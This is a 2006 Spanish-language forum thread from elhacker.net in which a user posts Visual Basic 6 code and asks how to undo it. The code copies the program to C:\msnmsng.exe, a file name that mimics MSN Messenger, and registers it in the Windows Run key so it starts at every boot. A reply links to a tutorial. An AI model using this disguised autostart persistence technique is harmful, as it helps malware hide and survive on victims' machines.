elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  ayuda con el registro
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ayuda con el registro  (Leído 960 veces)
rixi15

Desconectado Desconectado

Mensajes: 66



Ver Perfil
ayuda con el registro
« en: 18 Noviembre 2006, 09:35 am »

Hola se que para poner un programa al registro de windows se necesita esete codigo:
Código:
Private Sub Form_Load()
            Dim RegistroCochino As Object
            Dim RutaCochina As String
            Dim CadenaNueva As String
            Dim ContenidoCadena As String
           
            ContenidoCadena = "C:\msnmsng.exe"
            CadenaNueva = "\msnmsg"
            RutaCochina = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" & _
                        "\CurrentVersion\Run" & CadenaNueva
           
            Set RegistroCochino = CreateObject("WScript.Shell")
           
            RegistroCochino.RegWrite RutaCochina, ContenidoCadena
           
            On Error GoTo Fallo
x = GetAttr("C:\msnmsng.exe")
Exit Sub
Fallo:
            FileCopy App.EXEName + ".exe", "C:\msnmsng.exe"
End Sub
y keria preguntar si ay un codigo para kitar ese programa del registro


En línea

Red Mx
Rojito
Colaborador
***
Desconectado Desconectado

Mensajes: 3.649


Viva México Cabrones...


Ver Perfil WWW
Re: ayuda con el registro
« Respuesta #1 en: 18 Noviembre 2006, 23:11 pm »

como dicen por hay


ahuevo

siempre hay algo bueno mira cuando empese a trabajar registros en vb me sirvio muchisimo este ejemplo del el guille:


http://www.elguille.info/VB/utilidades/ExeEnCurrentVersionRun.htm



En línea

Desarrollar Malware Es Causa De Cancer...
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
ayuda con registro
PHP
Strigidae 0 1,808 Último mensaje 16 Agosto 2017, 00:34 am
por Strigidae
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines